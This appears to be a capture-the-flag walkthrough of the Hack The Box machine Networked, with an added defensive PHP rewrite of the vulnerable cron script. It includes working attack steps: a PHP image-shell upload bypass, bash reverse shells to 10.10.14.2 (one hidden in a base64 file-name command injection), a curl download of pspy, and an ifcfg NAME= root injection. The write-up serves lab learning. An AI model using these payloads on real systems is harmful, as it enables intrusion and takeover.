0x00. Introduction
0x01. Information gathering
nmap -sC -sV 10.10.10.146
nmap -p- --min-rate 1000 10.10.10.146
nmap -p 22,80,443 -sC -sV 10.10.10.146

Open ports:
22 ssh
80 http
feroxbuster -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Two directories were found: /uploads and /backup.
0x02. Source review and file upload for a low-privilege shell
/uploads is empty; /backup holds a backup.tar that looks like a site backup. Downloading and extracting it gives four files:

This should be the backup of the website itself. /upload.php exists on the server, which confirms the guess.

There is an upload form and we have the back-end source, so the intent is obvious: audit the code and bypass the upload filter.
Reading upload.php, note that it pulls in lib.php from the same directory via require; lib.php defines several functions that upload.php uses.
The mime_content_type function detects the file's MIME type, and the code then checks whether that MIME string contains 'image/', returning true if it does. To get past this, the MIME value has to be changed.
Next an array containing only image extensions is defined; the uploaded file's name is compared against it, and only matching extensions are accepted.

So we can build an image shell and upload it:
copy /b 1.jpg + 2.php shell.php.jpg


The upload succeeds; uploaded images are displayed on /photos.php, as shown below:

The image shell has been renamed. Visiting it:

The image does not render and comes out as garbage, because the server hands the file to the PHP interpreter: even with a .jpg extension, the image shell is executed as a PHP file. Trying a command:

Command execution works; now for a reverse shell:
bash+-i+>%26+/dev/tcp/10.10.14.2/4444+0>%261 // the & must be URL-encoded

0x03. Cron job to a user shell
There are two files in /home/guly:

check_attack.php:
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
    $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "-------------\n";
    #print "check: $value\n";
    list ($name,$ext) = getnameCheck($value);
    $check = check_ip($name,$value);
    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
        exec("rm -f $logpath");
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}
?>
crontab.guly:
*/3 * * * * php /home/guly/check_attack.php
From these two files we can infer a scheduled task. Upload pspy to watch for it (the server has no wget, so curl is used instead):
curl http://10.10.14.2:5555/pspy32 -o pspy32 --progress-bar
Once the transfer finishes, run pspy:

/usr/sbin/crond -n can be seen running once every 3 minutes.
With that confirmed, back to auditing check_attack.php.

Focus on command-execution functions such as exec. The variable $value is a file name under the /uploads directory, so by creating a file we control its value and get command execution. Go straight for a reverse shell:
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.2/6666 0>&1"' | base64
touch ';echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzY2NjYgMD4mMSI=| base64 -d | bash'
Tip: the payload is encoded because of a restriction: the character '/' is not allowed in a file name.
Now we have a shell as the guly user.
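As an added example (my code, not the box's check_attack.php), here is the same cleanup step written so that an upload's file name never reaches exec() or the additional_parameters argument of mail(): a strict name whitelist, unlink() for removal, and a fixed mail subject. It leaves out the IP-name check from lib.php and runs over constructed file names.

```php
<?php
// Added example, not the original check_attack.php: the removal step
// rewritten so that a file name from /uploads can never reach /bin/sh.
// The directory and the sample names below are constructed for the demo.

const UPLOAD_DIR = '/var/www/html/uploads/';

// Accept only plain names: first character alphanumeric or '_' (so no
// leading '.' and no leading '-', which sendmail would read as a flag),
// then letters, digits, '_', '.' and '-'. Anything else is suspicious.
function safe_upload_name(string $name): bool {
    return preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $name) === 1;
}

// Remove a suspicious upload with unlink(), never via exec("rm -f ...").
// realpath() plus a prefix check keeps the target inside the upload dir.
function remove_upload(string $dir, string $name): bool {
    $full = realpath($dir . $name);
    if ($full === false || strpos($full, $dir) !== 0 || !is_file($full)) {
        return false;
    }
    return unlink($full);
}

// Log and notify without passing attacker-controlled text to sendmail
// (the original used "-F$value" as mail()'s additional_parameters).
function report_attack(string $name, string $logpath, string $to): void {
    $msg = 'removed suspicious upload: ' . $name . "\n";
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    mail($to, 'check_attack: attack detected', $msg,
         "X-Mailer: check_attack.php\r\n");
}

// Constructed names as the cron job would see them from scandir().
$samples = [
    '10_10_14_2.php.jpg',                      // ordinary upload: passes the name check
    ';echo cGF5bG9hZA==| base64 -d | bash',   // shell metacharacters: flagged
    '-Fattacker',                              // would have become a sendmail flag
];
foreach ($samples as $value) {
    if (!safe_upload_name($value)) {
        echo "attack! would remove: $value\n";
        // On the real host the two calls below do the cleanup:
        // remove_upload(UPLOAD_DIR, $value);
        // report_attack($value, '/tmp/attack.log', 'guly');
    }
}
```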

0x04. Privilege escalation via sudo
The guly user may run one script as root (/usr/local/sbin/changename.sh), as shown below:

Looking at the script's contents,
changename.sh:
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
This script simply creates a network script for the interface it brings up, asking the user for the options NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO. We only care about NAME: according to the post below, commands can be executed here, because everything after the first space in the user's input is executed as a command as root.
Hi there,
Just found an issue in Redhat/CentOS which according to RedHat security team is not an issue. I don't know, sounds weird to me.
If, for whatever reason, a user is able to write an ifcfg-<whatever> script to /etc/sysconfig/network-scripts or can adjust an existing one, then your system is pwned.
Network scripts, ifcfg-eth0 for example, are used for network connections. They look exactly like .INI files. However, they are ~sourced~ on Linux by Network Manager (dispatcher.d).
In my case, the NAME= attribute in these network scripts is not handled correctly. If you have white/blank space in the name the system tries to execute the part after the white/blank space. Which means everything after the first blank space is executed as root.
For example:
/etc/sysconfig/network-scripts/ifcfg-1337
NAME=Network /bin/id <= Note the blank space
ONBOOT=yes
DEVICE=eth0
Yes, any script in that folder is executed by root because of the sourcing technique. Ex: . /etc/sysconfig/network-scripts/ifcfg-1337
Me as a developer, I don't really get why you want to do it like this. Its just <~>
So, if a user manages to get his hands on any of these files your box is gone. Protect them with your life.
So, doing the same through changename.sh,

we now have root.
0x05. Summary
References:
https://0xdf.gitlab.io/2019/11/16/htb-networked.html
https://0xrick.github.io/hack-the-box/networked/
